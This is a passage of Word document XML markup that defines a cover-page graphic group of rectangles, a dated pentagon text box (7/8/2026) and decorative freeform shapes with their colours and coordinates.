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7DF608" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="24" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="038B5872" wp14:editId="617205BF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>327660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>324485</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2487930" cy="10149840"/>
                <wp:effectExtent l="635" t="0" r="0" b="635"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name="Group 26"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2487930" cy="10149840"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2487960" cy="10149840"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2" name="Rectangle 3"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="220320" cy="10149840"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="21600" h="21600">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21600" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21600" y="21600"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="21600"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="0E2841"/>
                          </a:solidFill>
                          <a:ln w="19080">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="minor"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3" name="Pentagon 4"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1631160"/>
                            <a:ext cx="2487960" cy="614160"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="textAreaLeft" fmla="*/ 0 w 1410480"/>
                              <a:gd name="textAreaRight" fmla="*/ 1323360 w 1410480"/>
                              <a:gd name="textAreaTop" fmla="*/ 0 h 348120"/>
                              <a:gd name="textAreaBottom" fmla="*/ 348480 h 348120"/>
                            </a:gdLst>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
                            <a:pathLst>
                              <a:path w="87449" h="21600">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="76649" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="87449" y="10800"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76649" y="21600"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="21600"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="156082"/>
                          </a:solidFill>
                          <a:ln w="19080">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="minor"/>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="02F55F04" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="0"/>
                                <w:jc w:val="right"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>7/8/2026</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr tIns="0" rIns="182880" bIns="0" anchor="ctr">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wpg:grpSp>
                        <wpg:cNvPr id="499677978" name="Group 499677978"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="86400" y="4682520"/>
                            <a:ext cx="2332440" cy="5461560"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="0" cy="0"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <wpg:grpSp>
                          <wpg:cNvPr id="2087088053" name="Group 2087088053"/>
                          <wpg:cNvGrpSpPr/>
                          <wpg:grpSpPr>
                            <a:xfrm>
                              <a:off x="108000" y="0"/>
                              <a:ext cx="1870560" cy="5461560"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="0" cy="0"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvPr id="4" name="Freeform 20"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="408240" y="3508200"/>
                                <a:ext cx="345600" cy="1221840"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 195840"/>
                                  <a:gd name="textAreaRight" fmla="*/ 196200 w 195840"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 692640"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 693000 h 692640"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="5" name="Freeform 21"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="770760" y="4714200"/>
                                <a:ext cx="328320" cy="747360"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 186120"/>
                                  <a:gd name="textAreaRight" fmla="*/ 186480 w 186120"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 423720"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 424080 h 423720"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="6" name="Freeform 22"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="396360" cy="3533040"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 224640"/>
                                  <a:gd name="textAreaRight" fmla="*/ 225000 w 224640"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 2003040"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 2003400 h 2003040"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="7" name="Freeform 23"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="356760" y="1136520"/>
                                <a:ext cx="127080" cy="2372400"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 72000"/>
                                  <a:gd name="textAreaRight" fmla="*/ 72360 w 72000"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 1344960"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 1344960 h 1344960"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="8" name="Freeform 24"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="396720" y="3533760"/>
                                <a:ext cx="436320" cy="1746720"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 247320"/>
                                  <a:gd name="textAreaRight" fmla="*/ 247680 w 247320"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 990360"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 990720 h 990360"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="9" name="Freeform 25"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="855720" y="5269680"/>
                                <a:ext cx="93240" cy="191160"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 52920"/>
                                  <a:gd name="textAreaRight" fmla="*/ 53280 w 52920"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 108360"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 108720 h 108360"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
                                <a:pathLst>
                                  <a:path w="33" h="69">
                                    <a:moveTo>
                                      <a:pt x="0" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="33" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="24" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="12" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:close/>
                                  </a:path>
                                </a:pathLst>
                              </a:custGeom>
                              <a:solidFill>
                                <a:srgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="10" name="Freeform 26"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="382320" y="3397320"/>
                                <a:ext cx="41760" cy="258480"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 23760"/>
                                  <a:gd name="textAreaRight" fmla="*/ 24120 w 23760"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 146520"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 146520 h 146520"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
                                <a:pathLst>
                                  <a:path w="15" h="93">
                                    <a:moveTo>
                                      <a:pt x="0" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="9" y="37"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="9" y="40"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="93"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="49"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:close/>
                                  </a:path>
                                </a:pathLst>
                              </a:custGeom>
                              <a:solidFill>
                                <a:srgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="11" name="Freeform 27"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="754200" y="2586240"/>
                                <a:ext cx="1116360" cy="2127960"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 632880"/>
                                  <a:gd name="textAreaRight" fmla="*/ 633240 w 632880"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 1206360"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 1206720 h 1206360"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="12" name="Freeform 28"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="754200" y="4730760"/>
                                <a:ext cx="101520" cy="538560"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 57600"/>
                                  <a:gd name="textAreaRight" fmla="*/ 57960 w 57600"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 305280"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 305640 h 305280"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="13" name="Freeform 29"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="833040" y="5281200"/>
                                <a:ext cx="87480" cy="180360"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 49680"/>
                                  <a:gd name="textAreaRight" fmla="*/ 50040 w 49680"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 102240"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 102600 h 102240"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
                                <a:pathLst>
                                  <a:path w="31" h="65">
                                    <a:moveTo>
                                      <a:pt x="0" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="23" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:close/>
                                  </a:path>
                                </a:pathLst>
                              </a:custGeom>
                              <a:solidFill>
                                <a:srgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="14" name="Freeform 30"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="754200" y="4666680"/>
                                <a:ext cx="19800" cy="116280"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 11160"/>
                                  <a:gd name="textAreaRight" fmla="*/ 11520 w 11160"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 65880"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 66240 h 65880"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
                                <a:pathLst>
                                  <a:path w="7" h="42">
                                    <a:moveTo>
                                      <a:pt x="0" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="7" y="42"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="23"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:close/>
                                  </a:path>
                                </a:pathLst>
                              </a:custGeom>
                              <a:solidFill>
                                <a:srgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="15" name="Freeform 31"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="796320" y="5133960"/>
                                <a:ext cx="127080" cy="327600"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 72000"/>
                                  <a:gd name="textAreaRight" fmla="*/ 72360 w 72000"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 185760"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 186120 h 185760"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841"/>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841"/>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                        </wpg:grpSp>
                        <wpg:grpSp>
                          <wpg:cNvPr id="869386146" name="Group 869386146"/>
                          <wpg:cNvGrpSpPr/>
                          <wpg:grpSpPr>
                            <a:xfrm>
                              <a:off x="0" y="1076400"/>
                              <a:ext cx="2332440" cy="4385160"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="0" cy="0"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvPr id="16" name="Freeform 8"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="101520" y="1410840"/>
                                <a:ext cx="528840" cy="1866960"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 299880"/>
                                  <a:gd name="textAreaRight" fmla="*/ 300240 w 299880"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 1058400"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 1058760 h 1058400"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841">
                                  <a:alpha val="20000"/>
                                </a:srgbClr>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841">
                                    <a:alpha val="20000"/>
                                  </a:srgbClr>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="17" name="Freeform 9"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="660240" y="3243960"/>
                                <a:ext cx="498960" cy="1140480"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 282960"/>
                                  <a:gd name="textAreaRight" fmla="*/ 283320 w 282960"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 646560"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 646920 h 646560"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>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rgbClr val="0E2841">
                                  <a:alpha val="20000"/>
                                </a:srgbClr>
                              </a:solidFill>
                              <a:ln w="0">
                                <a:solidFill>
                                  <a:srgbClr val="0E2841">
                                    <a:alpha val="20000"/>
                                  </a:srgbClr>
                                </a:solidFill>
                              </a:ln>
                            </wps:spPr>
                            <wps:style>
                              <a:lnRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:lnRef>
                              <a:fillRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:fillRef>
                              <a:effectRef idx="0">
                                <a:scrgbClr r="0" g="0" b="0"/>
                              </a:effectRef>
                              <a:fontRef idx="minor"/>
                            </wps:style>
                            <wps:bodyPr/>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="18" name="Freeform 10"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="941760"/>
                                <a:ext cx="84600" cy="501480"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="textAreaLeft" fmla="*/ 0 w 47880"/>
                                  <a:gd name="textAreaRight" fmla="*/ 48240 w 47880"/>
                                  <a:gd name="textAreaTop" fmla="*/ 0 h 284400"/>
                                  <a:gd name="textAreaBottom" fmla="*/ 284760 h 284400"/>
                                </a:gdLst>
                                <a:ahLst/>
